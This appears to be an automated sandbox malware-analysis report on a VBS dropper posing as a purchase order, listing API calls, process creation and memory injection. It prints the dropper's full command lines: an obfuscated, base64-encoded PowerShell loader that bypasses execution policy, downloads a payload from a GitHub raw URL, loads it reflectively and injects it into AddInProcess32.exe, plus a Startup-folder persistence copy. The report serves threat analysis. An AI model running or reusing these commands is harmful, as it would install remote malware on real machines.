Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	11_2_0040AA71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,	11_2_00417AAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	11_2_0040AC78

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

11_2_00406D28

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior

Source: wscript.exe, 00000000.00000003.1355436493.000002354B37D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355697935.000002354B396000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1356150119.000002354B398000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355601341.000002354B38D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1356493400.000002354B3A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1480778933.000002354B3A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1356320468.000002354B3A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: LkhccKWPxcfbzdmpcNpopLLLsCqemULiooLgHokcUiGUnfUHqAcloKbfZilaHukvctkL
Source: wscript.exe, 00000000.00000003.1355436493.000002354B37D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355697935.000002354B396000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1481471747.000002354B521000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1356150119.000002354B398000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355601341.000002354B38D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1356493400.000002354B3A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1480778933.000002354B3A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1356320468.000002354B3A1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1481652155.000002354B621000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1480979409.00000235493BF000.00000004.00000020.00020000.00000000.sdmp, Purchase Order - PO14895.vbs	Binary or memory string: LkhccKWPxcfbzdmpcNpopLLLsCqemULiooLgHokcUiGUnfUHqAcloKbfZilaHukvctkL = "UpWucWsAbWWWLqQkKzKLZBhmCkuWTLCKLrWGacIWLKCkPKhWKxcNUeRWeBPteefeuLLi"
Source: powershell.exe, 00000008.00000002.1614913816.000001B05E4A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1355847554.000002354B339000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DLkhccKWPxcfbzdmpcNpopLLLsCqemULiooLgHokcUiGUnfUHqAcloKbfZilaHukvctkLWWWeG@
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

API call chain: ExitProcess graph end node

graph_11-47442

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

11_2_004327AE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

11_2_0041A8DA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_004407B5 mov eax, dword ptr fs:[00000030h]

11_2_004407B5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,

11_2_00410763

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_004327AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004328FC SetUnhandledExceptionFilter,	11_2_004328FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_004398AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00432D5C

HIPS / PFW / Operating System Protection Evasion

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxbQ0hhUl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 456000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 46E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 474000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 475000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 476000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47B000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 61D008	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

11_2_00410B5C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_004175E1 mouse_event,

11_2_004175E1

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxbQ0hhUl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\purchase order - po14895.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.orierocretse.vbs')')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjevuvjpdt01zugvjwzqsmjysmjvdlupvsu4njykokcgnv1bzdscrj3inkydsjysnid0gwscrj1feahr0chm6ly8nkydyyscrj3cujysnz2l0ahvidxnljysncmnvbnrlbicrj3quy29tl04nkydvrgv0zwn0tycrj24nkycvjysntm8nkydezxrljysny3rpjysnbi8nkydyzwzzl2hljysnyscrj2rzl21haw4vrccrj2v0ywhobycrj3rolscrj1yudhh0wvfeoycrjybxuhnijysnyxnlnjqnkyddb250zw4nkyd0id0gke4nkydljysndycrjy0nkydpjysnyicrj2onkydly3qguycrj3lzdgunkydtlicrj05ldc5xjysnzwjdbccrj2lljysnbicrj3qpjysnlkrvd25sbycrj2fku3ryaw4nkydnjysnkfdqjysnc3vyjysnbccrjyknkyc7jysnifcnkydqcycrj2jpjysnbmfyeunvbnrljysnbicrj3qgpsankydbu3lzjysndgvtlicrj0nvbicrj3zlcnrdoicrjzonkydgcicrj28nkydtqmfzzty0jysnu3ryascrj25nkfdqc2jhc2unkyc2nccrj0nvbicrj3rljysnbnqpjysnoycrjybxuhnhc3nlbscrj2inkydsjysnesa9iftsjysnzwzszwmnkyd0aw8nkydujysnlkfzc2vtymx5xto6tg8nkydhzchxjysnuccrj3niaw5hcnldbycrj250jysnzw50ktsgw2rubgknkydilicrj0lplicrj0hvbscrj2unkyddjysnoicrjzpwjysnquknkycojysnmdjwmc8nkydyz1f2ns9kl2vljysnlmv0jysnc2fwjysnly86c3b0jysndccrj2gwjysnmlysidayvmrljysnc2enkyd0ascrj3zhjysnzg8wmlysjysnidankycyvmqnkydlc2f0jysnaxzhjysnzg8wmicrj1ynkycsidayvmqnkydlc2f0axynkydhjysnzg8wmicrj1ysiccrjzankycyvkenkydkjysnzeluuccrj3jvyycrj2vzczmymdjwlccrjyawmlynkycwmlysmdinkydwmdjwkscplunyrxbmyunfkftdsgfsxtg3k1tdsgfsxtgwk1tdsgfsxtexnsksw0niyvjdmzyglunyrxbmyunficaow0niyvjdodkrw0niyvjdoderw0niyvjdnjgplftdsgfsxtm5ic1yzxbmyunlicanmdjwjyxbq0hhul0znckp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,26,25]-join'')((('wpsu'+'r'+'l'+' = y'+'qdhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/n'+'odetecto'+'n'+'/'+'no'+'dete'+'cto'+'n/'+'refs/he'+'a'+'ds/main/d'+'etahno'+'th-'+'v.txtyqd;'+' wpsb'+'ase64'+'conten'+'t = (n'+'e'+'w'+'-'+'o'+'b'+'j'+'ect s'+'yste'+'m.'+'net.w'+'ebcl'+'ie'+'n'+'t)'+'.downlo'+'adstrin'+'g'+'(wp'+'sur'+'l'+')'+';'+' w'+'ps'+'bi'+'naryconte'+'n'+'t = '+'[sys'+'tem.'+'con'+'vert]:'+':'+'fr'+'o'+'mbase64'+'stri'+'ng(wpsbase'+'64'+'con'+'te'+'nt)'+';'+' wpsassem'+'b'+'l'+'y = [r'+'eflec'+'tio'+'n'+'.assembly]::lo'+'ad(w'+'p'+'sbinaryco'+'nt'+'ent); [dnli'+'b.'+'io.'+'hom'+'e'+']'+':'+':v'+'ai'+'('+'02v0/'+'rgqv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2v, 02vde'+'sa'+'ti'+'va'+'do02v,'+' 0'+'2vd'+'esat'+'iva'+'do02'+'v'+', 02vd'+'esativ'+'a'+'do02'+'v, '+'0'+'2va'+'d'+'dinp'+'roc'+'ess3202v,'+' 02v'+'02v,02'+'v02v)')-creplace([char]87+[char]80+[char]115),[char]36 -creplace ([char]89+[char]81+[char]68),[char]39 -replace '02v',[char]34))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\windows\system32\purchase order - po14895.vbs', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sbv.orierocretse.vbs')')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjevuvjpdt01zugvjwzqsmjysmjvdlupvsu4njykokcgnv1bzdscrj3inkydsjysnid0gwscrj1feahr0chm6ly8nkydyyscrj3cujysnz2l0ahvidxnljysncmnvbnrlbicrj3quy29tl04nkydvrgv0zwn0tycrj24nkycvjysntm8nkydezxrljysny3rpjysnbi8nkydyzwzzl2hljysnyscrj2rzl21haw4vrccrj2v0ywhobycrj3rolscrj1yudhh0wvfeoycrjybxuhnijysnyxnlnjqnkyddb250zw4nkyd0id0gke4nkydljysndycrjy0nkydpjysnyicrj2onkydly3qguycrj3lzdgunkydtlicrj05ldc5xjysnzwjdbccrj2lljysnbicrj3qpjysnlkrvd25sbycrj2fku3ryaw4nkydnjysnkfdqjysnc3vyjysnbccrjyknkyc7jysnifcnkydqcycrj2jpjysnbmfyeunvbnrljysnbicrj3qgpsankydbu3lzjysndgvtlicrj0nvbicrj3zlcnrdoicrjzonkydgcicrj28nkydtqmfzzty0jysnu3ryascrj25nkfdqc2jhc2unkyc2nccrj0nvbicrj3rljysnbnqpjysnoycrjybxuhnhc3nlbscrj2inkydsjysnesa9iftsjysnzwzszwmnkyd0aw8nkydujysnlkfzc2vtymx5xto6tg8nkydhzchxjysnuccrj3niaw5hcnldbycrj250jysnzw50ktsgw2rubgknkydilicrj0lplicrj0hvbscrj2unkyddjysnoicrjzpwjysnquknkycojysnmdjwmc8nkydyz1f2ns9kl2vljysnlmv0jysnc2fwjysnly86c3b0jysndccrj2gwjysnmlysidayvmrljysnc2enkyd0ascrj3zhjysnzg8wmlysjysnidankycyvmqnkydlc2f0jysnaxzhjysnzg8wmicrj1ynkycsidayvmqnkydlc2f0axynkydhjysnzg8wmicrj1ysiccrjzankycyvkenkydkjysnzeluuccrj3jvyycrj2vzczmymdjwlccrjyawmlynkycwmlysmdinkydwmdjwkscplunyrxbmyunfkftdsgfsxtg3k1tdsgfsxtgwk1tdsgfsxtexnsksw0niyvjdmzyglunyrxbmyunficaow0niyvjdodkrw0niyvjdoderw0niyvjdnjgplftdsgfsxtm5ic1yzxbmyunlicanmdjwjyxbq0hhul0znckp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,26,25]-join'')((('wpsu'+'r'+'l'+' = y'+'qdhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/n'+'odetecto'+'n'+'/'+'no'+'dete'+'cto'+'n/'+'refs/he'+'a'+'ds/main/d'+'etahno'+'th-'+'v.txtyqd;'+' wpsb'+'ase64'+'conten'+'t = (n'+'e'+'w'+'-'+'o'+'b'+'j'+'ect s'+'yste'+'m.'+'net.w'+'ebcl'+'ie'+'n'+'t)'+'.downlo'+'adstrin'+'g'+'(wp'+'sur'+'l'+')'+';'+' w'+'ps'+'bi'+'naryconte'+'n'+'t = '+'[sys'+'tem.'+'con'+'vert]:'+':'+'fr'+'o'+'mbase64'+'stri'+'ng(wpsbase'+'64'+'con'+'te'+'nt)'+';'+' wpsassem'+'b'+'l'+'y = [r'+'eflec'+'tio'+'n'+'.assembly]::lo'+'ad(w'+'p'+'sbinaryco'+'nt'+'ent); [dnli'+'b.'+'io.'+'hom'+'e'+']'+':'+':v'+'ai'+'('+'02v0/'+'rgqv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2v, 02vde'+'sa'+'ti'+'va'+'do02v,'+' 0'+'2vd'+'esat'+'iva'+'do02'+'v'+', 02vd'+'esativ'+'a'+'do02'+'v, '+'0'+'2va'+'d'+'dinp'+'roc'+'ess3202v,'+' 02v'+'02v,02'+'v02v)')-creplace([char]87+[char]80+[char]115),[char]36 -creplace ([char]89+[char]81+[char]68),[char]39 -replace '02v',[char]34))"	Jump to behavior

Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managervider
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager!
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerFF
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager"
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerEM
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerK
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managers.net:55543
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerV
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager3
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager4
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager`
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager<
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managery
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Program Manager]
Source: AddInProcess32.exe, 0000000B.00000002.2645775493.0000000000A18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 11_2_004329DA cpuid

11_2_004329DA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: EnumSystemLocalesW,	11_2_0044F17B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: EnumSystemLocalesW,	11_2_0044F130
